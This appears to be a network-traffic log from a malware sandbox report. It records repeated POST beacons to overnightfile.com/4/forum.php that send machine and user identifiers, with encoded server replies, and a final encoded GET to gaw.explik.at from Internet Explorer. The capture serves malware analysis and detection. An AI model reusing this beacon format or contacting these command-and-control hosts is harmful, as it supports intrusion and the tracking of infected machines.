                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:15.878448963 CEST909INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:15 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFGTUARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:16.183455944 CEST910OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:16.271142006 CEST910INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:15 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 54 47 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBTGYARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:16.595324993 CEST911OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:16.685844898 CEST911INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:16 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFGTUARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:16.982656956 CEST911OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:17.069825888 CEST912INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:16 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZYBAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:17.381412029 CEST912OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:17.469480038 CEST912INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:17 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 4b 50 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHKPSARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:17.825907946 CEST913OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:17.913518906 CEST913INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:17 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZAZAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:18.221539021 CEST913OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:18.312180042 CEST914INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:17 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 4d 4e 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHMNSARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:18.600039959 CEST914OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:18.687941074 CEST914INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:18 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCKPXARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:19.011029959 CEST915OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:19.104196072 CEST915INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:18 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTKPGARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:19.412626982 CEST916OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:19.503447056 CEST916INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBZAYARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:19.814019918 CEST916OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:19.908598900 CEST917INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 56 45 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQVEJARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:20.210131884 CEST917OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:20.313064098 CEST917INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cAAZZARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:20.631592989 CEST918OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:20.719944954 CEST918INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:20 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 4d 4e 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVMNEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:21.028626919 CEST918OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:21.124447107 CEST919INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:20 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 43 58 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJCXQARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:21.448781013 CEST919OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:21.548600912 CEST919INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:21 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZYBAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:21.869719982 CEST920OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:21.966259003 CEST920INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:21 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJYBQARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:22.263708115 CEST921OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:22.359987974 CEST921INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:21 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGQJTARRABw==0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      7192.168.1.102497178.208.80.22680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Jul 14, 2020 11:22:06.369544029 CEST894OUTGET /webstore/Wn2lrwDcfADSyX9Xa/bQ9IeTtb06T_/2Fyc5Du3a5C/Lbn9mkIxBLN4KS/0RiYslQln2uSb526_2FZm/fNkDBZePuZrATiQn/27jcpwDh1RA4upt/WsONFtTjnt3E_2FciB/BuyJhj2lU/e7KhPQjbhtvsi_2BPEBm/dqg6KCxr123lryjC_2B/rsW0LaJL29JZD0HTL3n3by/0dLhDac4FZAm6/Cll4ZY31/36smpDyOWwQEQIQyBeyPrxB/AWWgeCY_2F/D0kB9OWlNSI7FBMD_/0A_0D0wKzQLR/qdmLCTbzmUv/6Bzg_2F16y0cMp/8eIeLRZDfPXuShbQ/W HTTP/1.1
                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                      Accept-Language: en-US
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: gaw.explik.at
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Jul 14, 2020 11:22:06.625502110 CEST895INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:06 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
